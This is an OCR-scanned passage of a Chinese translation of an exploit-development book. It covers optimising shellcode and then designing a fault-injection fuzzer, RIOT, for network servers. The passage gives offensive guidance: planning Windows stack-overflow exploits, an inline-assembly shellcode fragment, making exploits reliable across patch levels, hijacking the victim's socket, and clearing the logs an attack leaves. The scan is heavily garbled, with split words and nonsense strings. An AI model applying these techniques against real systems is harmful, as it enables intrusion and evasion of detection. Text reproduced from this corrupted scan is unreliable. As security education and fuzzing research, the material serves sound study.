Phrack Magazine, 385934, 5148 
http://www. phrack.org/archives/59/p59-0x17 

Q “Hacking the Linux Kernel Network Stack” (bioforge) 
Phrack Magazine, #6133, 381358 
http://www.phrack.org/archives/61/p61-0x0d Hacking the Linux Kernel Network Stack.txt 

Q “Analysis: ida ‘Code Red’ Worm” (Ryan Permeh, Marc Maiffret) 
www.eeye.com/html/Research/Advisories/AL20010717.html 


论文 档案 

下 面 为 有 用 论文 档案 的 链接 。 其 中 包括 前 面 列 出 的 大 部 分 文章 , 剩 下 的 是 另外 一 些 值得 阅读 
的 文档 。 

ü http://community.corest.com/~juliano/ 

a http://packerstormsecurity.nl/papers/unix/ 


15.5 ”优化 shellcode JF 


我 们 在 第 一 次 号 shellcode 时 ， 除 了 稍 纵 即 逝 的 新 鲜 感 外 ， 大 部 分 时 间 可 能 会 感到 枯燥 乏味 ， 
也 会 遇 到 很 多 麻烦 。 但 写 过 很 多 shellcode 之 后 ， 通 常会 积累 一 些 经 验 ， 也 会 考虑 怎样 优化 编写 过 
程 。 在 本 节 ， 我 们 试 着 把 已 有 的 方法 进行 归纳 总 结 ， 形 成 一 份 简短 、 易 读 的 指南 ， 指 导 大 家 优化 
shellcode 的 编写 过 程 。 

加 快 shellcode 编 写 的 最 好 方法 并 不 是 真正 地 去 写 shellcode， 而 是 利用 系统 调用 代理 (syscall 
proxy) 或 proglet 机 制 。 然 而 , 在 大 多 数 情况 下 ,编写 静态 漏洞 破解 程序 相对 来 说 还 是 要 简单 一 些 ， 
因此 ， 我 们 接 下 来 将 主要 讨论 怎样 优化 静态 漏洞 破解 程序 ， 并 改进 它 的 性 能 。 


15.5.1 计划 

在 分 析 漏 洞 、 编 写 攻击 代码 之 前 ， 最 好 先 制定 详细 的 计划 。 在 Windows 上 利用 普通 的 栈 溢出 
时 ， 可 以 这 样 规划 根据 你 怎么 写 攻击 代码 而 有 所 变化 )。 

(1) 算出 改写 返回 地 址 的 字 节 偏 移 量 。 

(2) 算出 负载 〈playload) 相对 于 寄存 器 的 位 置 。(ESP 指 向 我 们 的 缓冲 区 吗 ? 其 他 的 寄存 器 
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We? ) 

(3) 为 针对 的 产品 版 本 或 多 种 版 本 的 Windows 及 Service Pack 找 到 可 靠 的 jmp/call «register» 
偏 移 。 

(4) 创建 小 的 、 测 试用 的 、 由 大 量 NOP 指 令 构 成 的 shellcode， 确 认 是 否 发 生 内 存 破坏 。 

(5) 如 果 发 生 内 存 破 坏 ， 在 载荷 中 插入 跳 转 指 令 ， 绕 过 被 破坏 的 内 存 区 域 。 如 果 没 有 发 生 内 
存 破 坏 ， 用 真正 的 shellcode 代 替 由 大 量 NOP 指 令 构成 的 shellcode。 


15.5.2 ”用 内 联 汇编 写 shellcode 


合理 使 用 内 联 汇编 来 编写 shellcode 可 以 节省 很 多 时 间 。 许 多 编码 后 的 shellcode 是 难以 理解 的 
十 六 进 制 字 节 流 ， 在 实验 过 程 中 ， 如 果 你 想 插入 跳 转 指令 Cjmp) 绕 过 栈 中 被 破坏 的 部 分 ， 或 者 
想 对 shellcode 做 些小 修改 ， 那 这 些 十 六 进 制 字 节 流 将 不 会 提供 任何 帮助 。 试 看 如 下 代码 〈 下 面 是 . 
Visual C++ 代码 ， 但 也 可 用 于 gcc): 

char *sploit() 

{ 


{ 


; this code returns the address of the start of the code 
jmp get_sploit 
get_sploit_fn: 
pop eax 
jmp got_sploit 
get_sploit: . 
call get sploit fn ; get the current address into eax 


PPT eee iI I 


PEG ET LER EORR EE t E PEE EE OPE T E EO PEE EO d PP US 


; start of exploit 
jmp get eip 
get eip fn: 


pop edx 
jmp got eip 


get eip: 
call get eip fn ; get the current address into edx 


call get proc address: 
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mov ebx, 0x01475533 ; handle for loadlibrary 
sub ebx, 0x01010101 
mov ecx, dword ptr [ebx] 


用 这 种 方法 编写 代码 有 以 下 好 处 。 

a 可 以 很 方便 地 添加 注释 。 当 你 在 6 个 月 后 准备 修改 shellcode 时 ， 这 些 注 释 会 有 所 帮助 。 

a 使 用 注释 和 设置 的 断 点 ， 不 用 真正 执行 完 代码 ， 你 就 能 调试 、 测 试 shellcode。 如 果 你 的 攻 

击 代码 不 只 是 派生 shell， 那 么 允许 设置 断 点 是 非常 有 用 的 。 

a 可 以 很 方便 地 从 其 他 漏洞 破解 程序 里 剪 切 和 粘贴 部 分 shellcode。 

a 想 修改 代码 时 ， 不 必 经 历 神秘 的 剪 切 和 粘贴 ， 简 单 地 修改 汇编 程序 即 可 。 

当然 , 用 这 种 方法 写 的 漏洞 破解 程序 和 平常 用 的 有 点 不 一 样 ， 需 要 算出 破解 的 长 度 。 可 行 的 
解决 方法 是 ， 选择 编译 后 能 生成 空 字 节 的 指令 ， 把 它们 粘 到 shellcode 的 尾部 。 

add byte ptr [eax],al 

记 住 ， 上 面 的 指令 在 汇编 后 包含 两 个 空 字 节 。 这 样 的 话 ， 我 们 就 可 以 用 strien 求 出 攻击 代 
码 的 长 度 。 
15.5.3 维护 shellcode 库 

快速 编写 shellcode 的 方法 是 什么 ? 当然 是 直接 从 其 他 可 以 运行 的 代码 里 复制 粘贴 了 。 复制 谁 
的 代码 并 不 重要 ， 重 要 的 是 要 理解 这 些 代码 。 从 长 远 来 看 ， 即 使 当时 不 太 理 解 这 些 代 码 ， 但 一 样 
可 以 加 快 编写 漏洞 利用 代码 的 速度 ， 因 为 你 可 以 很 方便 地 修改 它 。 

当 收 集 很 多 漏洞 利用 代码 之 后 ， 可 能 会 对 其 中 的 某 几 个 情 有 独 钟 ， 但 在 编写 过 程 中 ， 如 果 可 
以 方便 地 参考 多 个 代码 , 将 有 助 于 我 们 提高 编写 质量 。 因 此 , 我 们 建议 你 按 自己 的 喜好 保存 代码 。 
比如 说 ， 一 个 文本 文件 保存 一 段 代 码 ， 把 它们 放 入 分 门 别 类 的 目录 ， 需 要 时 ， 就 可 以 通过 搜索 找 
到 这 些 代 码 了 。 
15.5.4 ”持续 运行 

持续 运行 是 一 个 十 分 复杂 的 主题 , 但 也 是 编写 高 质量 攻击 代码 的 关键 。 下 面 列 了 一 些 使 代码 
持续 运行 的 方法 及 有 用 的 信息 。 

o 如 果 你 结束 目标 进程 ， 它 会 自动 重启 吗 ? 如 果 会 ， 那 么 在 Windows 里 调用 exit()、 


ExitProcess () 或 TerminateProcess () 。 


口 如 果 你 结束 目标 线程 ， 它 会 自动 重启 吗 ? 如 果 会 ,那么 调用 ExitThread() 、 


TerminateThread() 或 等 价 的 函数 。 如 果 你 攻击 的 是 DBMS， 这 个 方法 将 工作 得 很 好 ，- 


因为 DBMS 倾 向 使 用 工作 线程 池 (Oracle 和 SQL Server 都 是 这 样 做 的 )。 

a 如 果 试 图 利用 堆 溢出 漏洞 ， 你 可 以 修复 被 破坏 的 堆 吗 ? 这 个 问题 有 些 麻烦 ， 但 本 书 提供 
了 一 些 线索 。 

在 恢复 控制 流程 方面 ， 有 以 下 选项 。 . 

口 触发 异常 处 理 程序 。 首 先 基 于 一 般 原 则 检查 异常 处 理 程序 一 一 编写 代码 最 简单 的 方法 就 
是 不 写 代码 。 如 果 目 标 进程 已 经 有 功能 丰富 的 异常 处 理 程序 ， 并 且 可 以 很 好 地 处 理 每 件 
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事情 ， 那 为 什么 不 调用 它 或 通过 异常 触发 它 呢 ? 
a 修复 栈 并 返回 主 调 函数 "。 用 这 个 方法 需要 一 些 技巧 ， 因 为 通过 搜索 内 存 的 方式 ， 从 栈 上 
获取 信息 比较 麻烦 。 不 过 在 某 些 情况 下 ， 可 以 使 用 这 个 方法 ， 因 为 它 的 优点 是 保证 你 不 
会 泄露 资源 。 基 本 上 说 ， 只 要 找到 获取 控制 时 改写 的 栈 数据 ， 把 它们 恢复 到 原来 的 状态 ， 
运行 zet 即 可 。 
返回 源头 。 你 可 以 通过 把 常量 加 到 栈 上 并 调用 ret 来 使 用 这 个 方法 。 如 果 在 你 获取 控制 的 
地 方 检查 调用 栈 回 溯 〈call stack)， 你 可 能 会 发 现 调用 树 里 的 某 些 点 可 用 于 ret， 而 不 会 出 
问题 。 例 如 ， 这 在 SQL-UDP 漏 洞 里 很 有 效 〈 曾 被 SQL Slammer HAJH). Ri, MRES 
泄露 一 些 资 源 。 
口 调用 源头 〈ancestor)。 必 要 时 ， 你 或 许可 以 在 进程 树 的 高 端 调用 过 程 ， 如 主线 程 过 程 。 在 
一 些 程序 里 ， 这 个 方法 很 有 效 ， 它 的 不 足 之 处 是 可 能 会 污 露 很 多 资源 〈 套 接 字 、 内 存 、 
文件 句柄 等 )， 从 而 导致 程序 运行 不 稳定 。 


15.5.5 “使 破解 程序 稳定 可 靠 


在 攻击 代码 可 以 正常 工作 后 , 再 多 问 几 个 问题 是 个 好 习惯 , 这 样 就 可 以 确定 是 否 继续 改进 代 
码 ， 以 使 它 更 稳定 。 尽 管 对 一 些 读 者 来 说 ， 只 要 有 一 个 可 工作 的 破解 程序 示例 就 足够 了 ， 但 如 果 
你 真 准备 在 实际 环境 中 使 用 它 , 那 应 该 编写 稳定 的 攻击 代码 , 使 它 在 恶劣 的 环境 里 可 以 通行 无 阻 ， 
不 管 以 何 种 方式 运行 都 不 会 影响 目标 主机 的 稳定 性 。 这 通常 是 个 好 主意 ， 有 助 于 减少 开发 时 间 ， 
如 果 这 一 阶段 的 工作 做 好 了 ， 那 么 在 新 问题 出 现时 ， 我 们 就 不 必 重 头 开始 修改 代码 了 。 

下 面 是 编写 稳定 的 攻击 代码 时 需要 考虑 的 ， 你 可 以 加 上 你 想到 的 内 容 。 

a 可 以 用 同一 段 攻击 代码 对 一 台 主 机 多 次 执行 攻击 吗 ? 

o 如 果 用 脚本 重复 执行 攻击 代码 ， 脚 本 工作 正常 吗 ? 为 什么 ? 

a 可 以 用 多 个 同一 段 攻击 代码 的 副本 对 一 台 主 机 同时 执行 攻击 吗 ? 

O 编写 的 Windows 攻击 代码 可 以 在 目标 操作 系统 的 所 有 的 补丁 上 工作 吗 ? 

a 代码 可 以 在 其 他 版 本 的 Windows 上 运行 吗 ? 比如 NT/2000/XP/2003? 

O 编写 的 Linux 攻击 代码 可 以 在 其 他 Linux 发 行 版 上 运行 吗 ? 不 需要 指定 偏 移 量 /版 本 ? 

a 为 了 使 攻击 代码 正常 工作 ， 需 要 用 户 输入 一 组 偏 移 量 吗 ? 如 果 需 要 ， 考 虑 在 代码 里 硬 编 

码 常见 的 偏 移 地 址 ， 并 以 有 意义 的 名 称 命名 它 ， 以 便 用 户 选择 。 如 果 想 完美 一 些 ， 可 以 
用 平台 无 关 性 技术 ， 例 如 用 Windows PE 头 部 的 LoadLibrary 和 GetProcAddress 的 地 址 ; 
或 不 依赖 具体 的 Linux 发 行 版 。 

a 如 果 目 标 主机 装 有 防火 墙 , 攻击 脚本 会 有 什么 反应 ? 如 果 IPTable 或 (在 Windows 上 ) IPSec 

的 过 滤 规 则 阻塞 这 个 连接 ， 攻 击 代码 是 否 会 挂 起 监控 目标 端口 的 程序 ? 
a 攻击 代码 会 留 下 什么 日 志 ? 怎么 清除 它 ? 


口 





O 调用 者 。 一 一 译 者 注 


15.5.6 ”窃取 连接 
如 果 你 正在 利用 远程 漏洞 ， 那 么 对 你 的 shell 来 说 ， 最 好 重用 攻击 时 使 用 的 连接 会 话 、 系 统 调 
用 、 代 码 数据 等 。 下 面 是 一 些 提示 。 

口 在 调用 公共 套 接 字 的 地 方 设置 断 点 (accept、recv、recvfrom、send、sendto)， 查看 
套 接 字句 柄 保存 在 哪里 ， 然 后 在 shellcode 里 面 解析 出 这 个 句柄 并 重用 它 。 这 可 能 涉及 使 用 
特殊 的 栈 、 帧 偏 移 地 址 或 使 用 getpeername 暴 力 猜测 发 现 所 指 的 套 接 字 。 

a 在 Windows 里 ， 你 可 能 想 在 ReaaFile 和 WriteFile 上 设置 断 点 ， 因 为 套 接 字句 柄 有 有 时 会 
用 到 它们 。 

a 如 果 你 没有 独占 套 接 字 的 访问 权 ， 不 要 放弃 。 找 出 访问 套 接 字 的 步骤 ， 然 后 照 苦 芦 画 际 。 
例如 在 Windows 里 ， 目 标 进 程 可 能 被 Event、Semaphore、Mutex 或 临界 区 使 用 。 在 前 三 种 
情况 下 ， 所 述 的 线程 可 能 会 调用 WaitForsingleObject (Ex) 或 WaitForMultiple- 
Objects (Ex); 在 后 一 种 情况 下 ， 它 必须 调用 EntercriticalSection。 在 所 有 这 些 情况 
T. 一 旦 建立 句柄 (或 临界 区 ), 每 个 人 都 要 等 待 ， 因 此， 你 可 以 等 待 访问 自己 的 计算 机 ， 
然后 和 其 他 线程 一 起 运行 。 


15.6 小结 


本 章 介 绍 了 编写 破解 代码 时 常用 的 工具 、 资料 和 实用 程序 , 另外 还 列举 了 一 些 互 联网 上 的 参 
考 资料 作为 补充 。 
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大 半 个 世纪 前 ， 人 们 就 开始 用 故障 注入 技术 检测 硬件 产品 的 容错 性 了 ， 如 今 ， 故 障 注 

入 更 是 广泛 应 用 于 各 行 各 业 。 比 如 说 ， 人 们 用 它 测试 汽车 的 零 部 件 、 飞 机 引 苟 ， 甚 至 
包括 咖啡 壶 的 加 热 盘 。 这 些 硬 件 故 障 注入 系统 一 般 通过 集成 电路 的 引 脚 电磁 干扰 产生 的 脉冲 、 电 
压 变 换 ， 在 某 些 情况 下 ， 甚 至 通过 使 用 辐射 ， 为 产品 注入 故障 。 目 前 ， 大 型 硬件 制造 商 在 产品 测 
试 过 程 中 或 多 或 少 都 会 使 用 故障 注入 系统 。 

随 着 信息 技术 从 模拟 向 数字 发 展 ， 软 件数 量 成 倍增 长 。 问 题 出 现 了 : 用 什么 测试 软件 的 稳定 
PENE? 

在 过 去 的 十 年 中 ， 陆 续 出 现 了 一 些 软件 故障 注入 系统 ， 用 于 检测 大 型 软件 里 的 严重 问题 。 在 
Office of Naval Research (ONR), Defense Advanced Research Project Agency (DARPA). National 
Science Foundation (NSF) 和 Digital Equipment Corporation (DEC) 资助 的 课题 研究 期 间 ， 专 家 
开发 了 多 种 软件 故障 注入 系统 。 软 件 故障 注入 系统 CIIDEPEND,. DOCTOR. Xception. FERRARI. 
FINE、FIST、ORCHESTRA、MENDOSUS 和 ProFI) 已 经 表明 故障 注入 技术 可 以 在 大 型 软件 里 找 出 
很 多 隐藏 的 问题 。 其 中 的 一 些 系统 用 于 解决 类 似 的 问题 一 一 给 软件 开发 组 提供 资源 ， 以 允许 他 们 
测试 软件 的 容错 性 。 在 公开 和 私有 领域 内 已 经 陆续 出 现 了 一 些 解决 方案 ,用 于 在 软件 里 寻找 安全 
漏洞 。 现 在 的 社会 是 信息 社会 ， 软 件 的 安全 问题 日 益 重 要 ， 因 此 ， 迫 切 需要 用 一 些 技术 来 提升 软 
件 的 安全 性 。 

质量 保障 (QA) 工程 师 每 天 都 会 使 用 故障 注入 工具 检测 潜伏 在 软件 里 的 漏洞 。 对 质量 保障 
工程 师 来 说 ， 最 有 用 的 技能 是 将 多 种 测试 工具 整合 在 一 起 ， 使 它们 以 协同 的 方式 自动 工作 。 软 件 
安全 审计 师 可 以 从 质量 保障 中 学 到 很 多 知识 。 许 多 有 才能 的 安全 审计 师 用 手动 审计 技术 (主要 是 
逆向 工程 和 源码 审计 )， 寻 找 软 件 中 潜在 的 安全 问题 。 手 动 审计 技术 虽然 不 是 安全 审计 师 必 备 的 
技能 ， 但 也 很 有 用 ， 然 而 对 安全 审计 师 来 说 ， 开 发 自动 审计 系统 的 能 力 同样 重要 。 因 为 在 逆向 工 
程 或 软件 测试 期 间 ， 如 果 要 求 他 们 执行 另外 的 审计 任务 ,他们 可 以 根据 以 往 的 经 验 快速 配置 好 审 
计 系 统 ， 用 来 协助 审计 软件 ， 这 种 自动 审计 系统 可 以 同时 进行 多 个 审计 任务 。 因 此 ， 具 备 这 种 能 
力 的 安全 审计 师 可 以 完成 数 千 个 ， 至 少 也 是 数 百 个 普通 安全 审计 师 独 立 工作 才 能 完成 的 任务 。 

故障 测试 中 最 值得 称道 的 是 , 你 在 开发 解决 方案 期 间 所 犯 的 每 个 错误 都 可 能 会 增加 测试 成 功 
率 。 因 为 在 开发 过 程 中 所 犯 的 错误 只 是 众多 偶然 事件 中 的 一 个 ， 如 果 返 回 初始 状态 ， 将 反复 犯 的 
错误 列举 出 来 ， 并 在 故障 测试 程序 中 为 每 个 错误 建立 测试 序列 ， 那 你 很 有 可 能 攻破 大 多 数 的 大 型 
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软件 。 

设计 故障 注入 系统 将 推动 你 深入 学 习 攻 击 方面 的 知识 ， 从 而 更 直观 地 了 解 它 们 。 随 着 你 理解 
或 掌握 的 攻击 模式 的 增多 ， 你 由 此 获得 的 技能 和 知识 又 会 帮助 你 理解 其 他 的 攻击 模式 ， 并 使 你 的 
审计 组 件 更 强大 。 当 然 ， 审 计 程 序 里 最 有 用 的 组 件 是 自动 审计 部 分 ， 因 为 有 了 它们 ， 在 你 睡觉 的 
时 候 ， 故 障 注入 系统 甚至 都 可 能 发 现 震 惊 世 界 的 漏洞 。 

在 本 章 , 我 们 将 亲自 动手 设计 并 实现 一 个 故障 注入 系统 , 它 的 作用 是 找 出 网 络 服务 器 软件 中 
的 安全 问题 。 网 络 服务 器 软件 是 指 运行 在 基于 协议 的 网 络 媒介 之 上 的 软件 。 我 们 称 这 个 系统 为 
RIOT， 它 和 发 现 非常 流行 的 漏洞 的 故障 注入 系统 〈 设 计 于 2000 年 1 月 ， 发 现 过 儿 个 完全 公开 的 漏 
洞 ， 如 Code Red 病毒 利用 的 漏洞 ) 非常 类 似 。 通 过 使 用 RIOT， 我 们 可 以 找 出 某 些 程序 [如 微软 的 
Internet Information Server 5.0 (IIS 5.0) ] 里 的 安全 问题 ， 从 而 展示 故障 注入 系统 的 效能 。 


16.1 设计 概要 


我 们 设计 的 故障 注入 系统 包括 如 图 16-1 所 示 的 功能 组 件 。 大 部 分 的 故障 注入 系统 也 采用 类 似 
的 分 类 。 接 下 来 深入 讨论 每 一 个 组 件 ， 并 在 最 后 把 它们 组 装 在 一 起 形成 RIOT。 


3. 审计 员 从 捕获 的 包 里 





















































选择 一 系列 输入 包 提 4. 把 故障 注入 捕获 的 客 
供给 故障 注入 引擎 户 端 输入 里 并 把 他 们 
ee ane ü » ANU Je BS te ft 
WA UR NGA 
户 端的 网 络 流量 
^u 
----9----L227-997-------------------- > 
客户 与 服务 器 通信 emm 
1. 通 过 用 客户 端 软 件 包 客户 与 服务 器 之 间 的 通信 通常 5. 使 用 故障 监视 组 件 可 
与 服务 器 通信 生成 网 是 一 些 网 络 协议 ， 如 HTTP、 以 捕获 目标 软件 里 生 
络 流量 SMTP、FTP、IMAP 和 POP3 成 的 异常 


图 16-1 RIOT 故障 注入 模型 


16.1.1 生成 输入 数据 


故障 注入 系统 收集 输入 数据 的 媒介 有 很 多 种 ， 但 考虑 到 篇 幅 的 因素 ， 我 们 只 介绍 其 中 几 种 。 
输入 数据 可 以 分 成 不 同 的 测试 序列 ， 每 个 序列 都 是 一 组 发 送 给 目标 程序 的 测试 数据 。 输 入 数据 包 
含 的 数据 量 和 类 型 将 决定 故障 注入 系统 执行 何 种 测试 。 当 我 们 的 输入 数据 可 以 集合 起 来 而 和 内 容 
无 关 时 ， 如 果 提 供 的 输入 数据 可 以 和 深奥 的 、 未 经 测试 的 软件 进行 通信 ， 那 我 们 发 现 错误 的 机 率 
将 会 大 大 提高 。 

在 这 个 例子 里 ， 我 们 关注 应 用 层 协 议 的 输入 数据 ， 如 HTTP 事 务 (transaction) 中 客户 端的 第 
一 次 状态 。 我 们 可 以 通过 捕获 浏览 器 与 Web 服 务 器 之 间 的 会 话 收集 输入 数据 。 假 设 监控 本 机 网 络 
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通信 时 ， 捕 获 到 如 下 的 客户 端 请 求 
GET /search.ida?group=kuroto&g=riot HTTP/1.1 
Accept: */* 
Accept-Language: en-us 
Accept-Encoding: gzip, deflate 
User-Agent: Mozilla/4.0 
Host: 192.168.1.1 
Connection: Keep-Alive 
Cookie: ASPSESSIONIDONNNNTEG-ODDDDIOANNCXXXXIIMGLLNNG 


不 太 熟 悉 HTTP 协 议 的 读者 可 能 注意 到 .iaa 不 是 标准 的 文件 扩展 名 。 当 在 搜索 引擎 上 寻找 
相关 信息 时 ， 我 们 发 现 信息 比较 缺乏 ， 仅 提 到 它 是 ISAPI 过 滤器 ， 安 装 在 多 种 版 本 的 IS Web 
服务 器 上 。 


注解 任何 难以 学 习 、 难 以 使 用 、 难 以 让 人 喜欢 的 特征 ， 往 往 是 寻找 安全 漏洞 的 好 地 方 。 因 为 

如 果 这 些 特征 使 你 的 注意 力 偏离 了 程序 的 主要 功能 ， 那 么 它 对 开发 者 和 测试 者 可 能 会 产 

生 同 样 的 影响 一 一 在 它 送 达 那 些 固执 的 客户 之 前 ， 

前 面 的 例子 数据 将 提供 给 测试 程序 的 故障 注入 组 件 , 故障 注入 组 件 在 适当 修饰 后 , 把 故障 ( 坏 
的 或 意外 的 输入 数据 ) 插入 输入 数据 。 我 们 提供 给 故障 注入 组 件 的 输入 数据 在 很 大 程度 上 影响 了 
测试 范围 ， 而 输入 数据 的 质量 在 很 大 程度 上 影响 测试 效果 。 如 果 我 们 提供 的 输入 数据 无 效 ， 目 标 
程序 审核 这 些 输入 数据 将 要 花 去 很 多 时 间 。 基 于 这 方面 的 考虑 ， 我 们 应 该 仔细 收集 输入 数据 。 在 
全 面 测试 前 ， 根 据 收集 的 输入 数据 的 多 少 ， 最 好 能 手动 抽查 它们 的 质量 。 

我 们 可 以 用 多 种 方法 收集 输入 数据 ， 然 后 把 它 交 给 故障 注入 组 件 。 在 实际 测试 过 程 中 , 我 们 
将 根据 测试 的 故障 类 型 选择 一 种 方法 〈 或 几 种 方法 的 组 合 ) 来 生成 输入 数据 。 

1. 手动 生成 

手动 生成 输入 数据 需要 很 多 时 间 , 但 通常 会 得 到 最 好 的 结果 。 我 们 可 以 用 常见 的 编辑 器 创建 
输入 数据 ， 把 创建 的 每 个 测试 序列 作为 单独 的 文件 保存 在 目录 里 。 测 试 程序 在 测试 过 程 中 用 单个 
函数 检查 这 个 目录 ， 每 次 读 入 一 个 序列 ， 把 它 交 给 故障 注入 组 件 。 我 们 的 RIOT 就 是 使 用 的 这 个 
方法 。 当 然 ， 也 可 以 把 输入 数据 保存 在 数据 库 或 直接 放 在 测试 程序 中 ， 但 把 输入 数据 单独 存 为 文 
件 ， 这 样 可 以 减少 为 了 组 织 数据 、 记 录 数 据 大 小 、 处 理 数据 内 容 而 构建 定制 数据 结构 的 麻烦 。 

2. 自动 生成 

对 一 些 简单 的 协议 ， 如 HTTP， 我 们 可 能 想 自 己 生成 输入 数据 。 为 此 ,需要 认真 学 习 协 议 规 
范 ， 设 计 相 应 的 算法 来 生成 输入 数据 。 在 我 们 计划 对 协议 进行 大 范围 测试 ， 而 又 不 想 手动 创建 所 
有 的 输入 数据 时 ， 自 动 生成 输入 数据 就 非常 有 用 了 。 在 我 的 测试 经 验 中 ,我 发 现在 处 理 那 些 可 靠 
结构 的 协议 〈 例 如 许多 应 用 层 的 协议 ) 时 ， 自 动 生成 输入 数据 的 效果 很 好 ， 但 碰 到 多 层 和 多 状态 
的 动态 协议 时 ， 自 动 生成 的 输入 数据 就 没什么 用 了 。 自 动 生成 的 输入 数据 里 的 错误 可 能 在 测试 进 
行 几 小 时 后 才 会 出 现 ， 在 自动 生成 输入 数据 的 过 程 中 ， 如 果 没 有 进行 严格 的 监控 ,那么 很 可 能 无 
法 发 现 输入 数据 中 的 问题 。 
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3. 实际 捕获 

一 些 ORCHESTRA 这 样 的 解决 方案 可 以 把 故障 直接 注入 现 有 的 通信 协议 中 , 这 个 方法 在 测试 复 
杂 的 基于 状态 的 协议 时 非常 有 效 。 但 这 个 方法 有 一 个 问题 ， 就 是 用 户 不 能 自己 定义 协议 ， 而 必须 
对 测试 数据 做 相应 的 改变 才能 保证 传送 成 功 。 例 如 , 如果 要 更 改 协议 报 文 里 某 个 字段 的 数据 大 小 ， 
系统 可 能 会 要 求 你 同时 更 新 报 文 里 的 多 个 长 度 字段 ,以 反映 你 所 做 的 修改 。 有 些 团 队 用 自己 的 方 
法 来 解决 这 样 的 问题 ,其 中 也 包括 开发 oRcHESTRA 的 研究 人 员 ， 他 们 利用 协议 的 额外 部 分 来 定义 
协议 的 必要 特性 。 

4. 模糊 测试 方法 生成 

在 20 世 纪 80 年 代 晚 期 到 90 年 代 初 期 ，Barton Miller. Lars Fredriksen 和 Bryan So 致力 于 研究 
UNIX 命 令 行 程 序 的 完整 性 。 在 一 个 暴风 雨 过 后 的 夜晚 ， 其 中 的 一 位 研究 者 通过 拔 号 线路 连 到 远 
程 服务 器 ， 在 准备 运行 某 个 UNIX 程 序 时 ， 由 于 线路 噪音 ， 一 些 随 机 数据 代替 了 他 的 输入 被 发 送 
到 UNIX 程 序 里 ， 当 程序 执行 时 ， 因 为 这 些 随 机 数据 的 存在 ， 导 致 程序 产 生 核心 转 储 。 根 据 这 个 
发 现 ， 三 位 研究 者 开发 了 FUZZ 系 统 ， 用 于 生成 伪 随 机 输入 数据 来 测试 程序 的 完整 性 。 现 在 ， 模 
糊 测试 输入 生成 已 成 为 众多 故障 注入 系统 的 一 部 分 。 如 果 你 想 了 解 FUZZ 的 更 多 内 容 ， 请 访问 
http:/www.cs.wisc.edu/~bart/fuzz/。 

很 多 安全 审计 师 认为 ， 在 测试 过 程 中 使 用 FUZZ 输 入 数据 和 在 黑暗 中 射 杀 蝙 蝠 差不多。 但 事 
实 并 不 是 这 样 ， 在 开发 FUZZ 的 过 程 中 ， 这 三 位 研究 者 在 众多 的 程序 中 发 现 了 整数 溢出 、 缓 冲 区 
溢出 、 格 式 化 串 漏 洞 和 普通 语法 分 析 程 序 的 问题 。 而 且 值 得 注意 的 是 ， 这 些 漏洞 直到 十 年 后 才 逐 
渐 被 公众 所 了 解 和 接受 。 


16.1.2 ”故障 注入 

16.1.1 节 讨论 了 故障 注入 系统 生成 输入 数据 的 方法 。 在 本 节 ， 我 们 将 讨论 怎样 修正 那些 不 好 
的 、 可 能 会 出 问题 的 输入 数据 。 比 如 说 目标 程序 里 的 异常 就 可 能 诱发 故障 注入 组 件 的 问题 。 

在 整个 开发 过 程 中 ， 只 有 到 了 这 个 阶段 ， 才 算 真 正 勾勒 出 整个 系统 的 轮廓 。 虽 然 所 有 的 故障 
注入 系统 在 收集 输入 数据 的 方法 上 都 有 一 定 的 共性 , 但 在 注入 故障 的 方法 、 被 注入 的 故障 类 型 方 
面 还 是 存在 很 大 差异 的 。 比 如 说 ， 有 些 故 障 注入 系统 需要 访问 源 代码 ， 以 便 审计 师 在 运行 时 获取 
信息 , 并 及 时 修正 测试 中 的 程序 。 而 我 们 的 故障 注入 组 件 主要 面向 缺乏 源码 的 二 进 制程 序 , 因此 ， 
我 们 不 用 修改 目标 程序 ， 只 需 修 改 传 给 目标 程序 的 输入 数据 。 


16.1.3 修正 引擎 

收集 的 输入 数据 经 过 处 理 并 传 给 修正 引擎 后 , 我 们 就 可 以 把 故障 插入 其 中 了 。 修正 引擎 在 重 
复 处 理 输入 数据 的 过 程 中 ,需要 在 内 存 里 保存 输入 数据 的 原始 副本 ， 以 方便 我 们 获取 、 修 改 和 交 
付 测试 序列 。 在 这 个 例子 里 ,重复 的 过 程 是 : 在 输入 数据 中 注入 故障 ， 然 后 把 修改 后 的 测试 序列 
交 给 目标 程序 。 我 们 现在 讨论 的 修正 引擎 用 于 寻找 缓冲 区 溢出 漏洞 ， 可 以 在 
http://www.wiley.com/go/shellcodershandbook 找 到 它 。 这 个 引擎 把 输入 数据 分 成 不 同 的 单元 ， 在 每 
个 单元 〈 在 这 个 例子 里 ， 单 元 是 变 长 的 数据 缓冲 区 ) 后 插入 故障 ， 然 后 把 它 交 给 目标 程序 。 我 们 
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使 用 的 引擎 和 其 他 的 故障 注入 系统 不 太一 样 ， 主 要 区 别 是 它 不 是 盲目 地 插入 故障 , 而 是 事先 检查 
输入 数据 ,根据 输入 数据 的 内 容 再 决定 插入 故障 的 位 置 。 这 个 引擎 也 会 根据 目标 进程 当时 的 运行 
环境 , 对 插入 的 故障 进行 简单 的 修饰 ， 以 便 我 们 提交 的 输入 数据 在 审计 过 程 中 不 会 被 目标 程序 的 
输入 处 理 系统 丢弃 。 上 述 几 个 特点 再 加 上 其 他 的 不 同 点 可 以 大 大 提高 故障 注入 系统 的 效率 。 

如 果 你 以 前 写 过 故障 注入 系统 ， 那 你 很 可 能 已 经 经 历 过 从 生成 输入 数据 、 注 入 故障 ， 到 把 它 
们 交 给 目标 程序 的 过 程 。 在 整个 过 程 中 ， 你 可 能 注意 到 ， 如 果 没 有 对 故障 注入 逻辑 进行 优化 ， 每 
个 测试 会 话 都 可 能 会 耗费 很 多 时 间 ， 而且 也 可 能 会 执行 许多 不 必要 的 测试 。 因此， 适当 地 优化 故 
障 注入 逻辑 ， 可 以 大 大 减少 总 体 测 试 时 间 。 先 看 一 个 简单 的 输入 流 : 

GET /index.html HTTP/1.1 

Host: test.com 


假设 我 们 开始 测试 ， 把 故障 插入 点 定位 在 HTTP 方法 G 后 。 在 第 一 次 重复 过 程 中 ,我 们 在 该 点 
插入 故障 ， 然 后 把 修改 后 的 输入 数据 交 给 目标 程序 ， 在 提交 完成 后 ， 在 这 里 插入 下 一 个 故障 ， 然 
后 再 次 提交 修改 后 的 输入 数据 ， 这 个 过 程 将 持续 到 循环 完 所 有 可 能 的 故障 后 结束 。 接 下 来 把 故障 
插入 点 往 后 挪 ， 也 就 是 作为 HTTP 方法 E 的 第 2 个 字 节 ， 然 后 像 前 面 那 样 ， 重 复 插入 每 个 故障 ， 并 
把 修改 后 的 输入 数据 提交 给 目标 程序 。 换 句 话说， 对 于 输入 数据 的 每 个 插入 点 ， 我 们 都 将 重复 
